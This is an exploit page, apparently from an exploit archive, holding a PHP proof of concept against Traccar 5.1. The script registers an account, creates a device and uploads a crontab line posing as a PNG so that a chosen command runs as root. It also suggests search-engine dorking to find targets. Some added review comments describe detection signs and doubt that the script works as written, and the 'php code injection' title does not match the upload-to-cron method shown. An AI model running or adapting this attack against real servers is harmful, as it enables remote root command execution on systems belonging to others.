## https://sploitus.com/exploit?id=PACKETSTORM:181804
=============================================================================================================================================  
| # Title : Traccar 5.1 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.traccar.org/old-versions/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engines.
  
[+] This PHP script assumes you are targeting a similar HTTP service that allows file uploads and exposes a REST API.
  
[+] save payload as poc.php  
  
[+] usage : C:\www\test>php poc.php  
  
[+] Line 117 : login info : 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');  
  
[+] payload :  
  
<?php  
  
/**
 * Proof-of-concept client for the Traccar REST API described on this page.
 *
 * It issues four requests in order: POST api/users (self-registration),
 * POST api/session (login), POST api/devices (create a device) and
 * POST api/devices/{id}/image (upload of a file declared as image/png whose
 * body is a crontab line built from $cmd). A defender reviewing the access
 * logs of a Traccar instance can look for exactly this sequence from a single
 * client, and for "image" uploads whose content is not a PNG.
 *
 * NOTE(review): no cookie jar, cookie file or token is ever configured here,
 * and the session call's result is discarded, so nothing visible in this
 * class carries the login to the later requests. Whether the script works
 * end-to-end as written is not established by this code.
 */
class TraccarExploit {

// Target host (IP or hostname) without scheme.
private $host;
// Target TCP port; the constructor defaults it to 8082.
private $port;
// Display name sent as 'name' when registering the user.
private $username;
// Password used for both registration and login.
private $password;
// E-mail used for both registration and login.
private $email;
// Path prefix (normally '/') prepended to every api/... path.
private $target_uri;

/**
 * Store the connection and account parameters; no request is sent here.
 *
 * @param string $host       target host
 * @param int    $port       target port (default 8082)
 * @param string $username   name for the registered account
 * @param string $password   password for the registered account
 * @param string $email      e-mail for the registered account
 * @param string $target_uri path prefix, must end with '/' for the api/ paths below to join correctly
 */
public function __construct($host, $port = 8082, $username = '', $password = '', $email = '', $target_uri = '/') {
$this->host = $host;
$this->port = $port;
$this->username = $username;
$this->password = $password;
$this->email = $email;
$this->target_uri = $target_uri;
}

/**
 * Issue one plain-HTTP request and decode the response body as JSON.
 *
 * Only a Content-Type header is sent: there is no Authorization header and
 * no cookie handling, so every call is an independent, anonymous request.
 * The return value of curl_exec() is not checked; a false result reaches
 * json_decode(), which then yields null, and the callers treat null as failure.
 *
 * @param string      $method HTTP verb, passed straight to CURLOPT_CUSTOMREQUEST
 * @param string      $uri    path appended to http://host:port
 * @param string|array|null $data request body; only sent when truthy
 * @param string      $ctype  value of the Content-Type header
 * @return mixed decoded JSON as an associative array, or null on an empty or non-JSON response
 */
public function send_request($method, $uri, $data = null, $ctype = 'application/json') {
// Plain http://, so the whole exchange (including credentials) is cleartext on the wire.
$url = "http://{$this->host}:{$this->port}{$uri}";

// NOTE(review): this explicit Content-Type is also applied to the multipart
// upload below; it replaces whatever header curl would otherwise generate
// for an array body — confirm the boundary is still set in that case.
$headers = [
"Content-Type: {$ctype}",
];

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Truthiness check: an empty string or '0' body is silently dropped.
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$response = curl_exec($ch);
curl_close($ch);

return json_decode($response, true);
}

/**
 * Self-register a user account via POST api/users.
 *
 * Registration is attempted anonymously, so this step only succeeds on an
 * instance that permits self-registration. Terminates the script with die()
 * on failure.
 *
 * NOTE(review): success is judged by a 'code' key in the decoded body being
 * exactly 200; whether the API returns such a field is not shown here — confirm.
 */
public function register_user() {
echo "Registering new user...\n";

$body = json_encode([
'name' => $this->username,
'email' => $this->email,
'password' => $this->password,
'totpKey' => null
]);

$res = $this->send_request('POST', $this->target_uri . 'api/users', $body);

if (!$res || $res['code'] !== 200) {
die("Failed to register user. Response: " . print_r($res, true));
}

echo "User registered successfully.\n";
}

/**
 * Log in via POST api/session with a form-encoded e-mail/password pair.
 *
 * The decoded response is only inspected for $res['code'] and then
 * discarded; no session identifier is stored on the object. Terminates the
 * script with die() on failure.
 */
public function authenticate() {
echo "Authenticating...\n";

$data = http_build_query([
'email' => $this->email,
'password' => $this->password
]);

$res = $this->send_request('POST', $this->target_uri . 'api/session', $data, 'application/x-www-form-urlencoded');

if (!$res || $res['code'] !== 200) {
die("Failed to authenticate. Response: " . print_r($res, true));
}

echo "Authenticated successfully.\n";
}

/**
 * Create a device, then upload a text file disguised as a PNG to its image endpoint.
 *
 * The device gets random name and uniqueId values. The uploaded file is a
 * single crontab line into which $cmd is interpolated verbatim (no quoting
 * beyond the surrounding single quotes), sent with a random .png filename
 * and an image/png MIME type. For detection: an upload to
 * api/devices/{id}/image whose content does not start with a PNG header is
 * the artefact this method produces. The upload response is not checked.
 *
 * NOTE(review): curl_file_create() is given a data:// URI rather than a
 * filesystem path; whether libcurl resolves PHP's data:// stream wrapper is
 * not established here — confirm.
 *
 * @param string $cmd shell command text placed inside the crontab line
 */
public function upload_cron_file($cmd) {
echo "Adding new device...\n";

$body = json_encode([
'name' => bin2hex(random_bytes(8)),
'uniqueId' => bin2hex(random_bytes(8))
]);

$res = $this->send_request('POST', $this->target_uri . 'api/devices', $body);

if (!$res || $res['code'] !== 200) {
die("Failed to add device. Response: " . print_r($res, true));
}

// The device id returned by the API selects the image endpoint below.
$device_id = $res['id'];
$cron_job = "* * * * * root /bin/bash -c '{$cmd}'\n";
$cron_filename = bin2hex(random_bytes(6));

echo "Uploading crontab file...\n";

$file_data = [
'file' => curl_file_create("data://text/plain;base64," . base64_encode($cron_job), 'image/png', "{$cron_filename}.png")
];

$this->send_request('POST', $this->target_uri . "api/devices/{$device_id}/image", $file_data, 'multipart/form-data');

// Printed unconditionally: nothing above verifies that the upload was accepted.
echo "Cronjob file uploaded successfully. Waiting for execution...\n";
}

/**
 * Run the three steps in order: register, authenticate, upload.
 *
 * @param string $cmd forwarded unchanged to upload_cron_file()
 */
public function exploit($cmd) {
$this->register_user();
$this->authenticate();
$this->upload_cron_file($cmd);
}
}
  
// Usage example:
// Host, port and the sample credentials below are the page author's values;
// the script sends them in cleartext over plain HTTP.
$exploit = new TraccarExploit('127.0.0.1', 8082, 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');
// The argument is interpolated verbatim into the crontab line built in upload_cron_file().
$exploit->exploit('id'); // Replace 'id' with your desired command to execute
  
?>  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================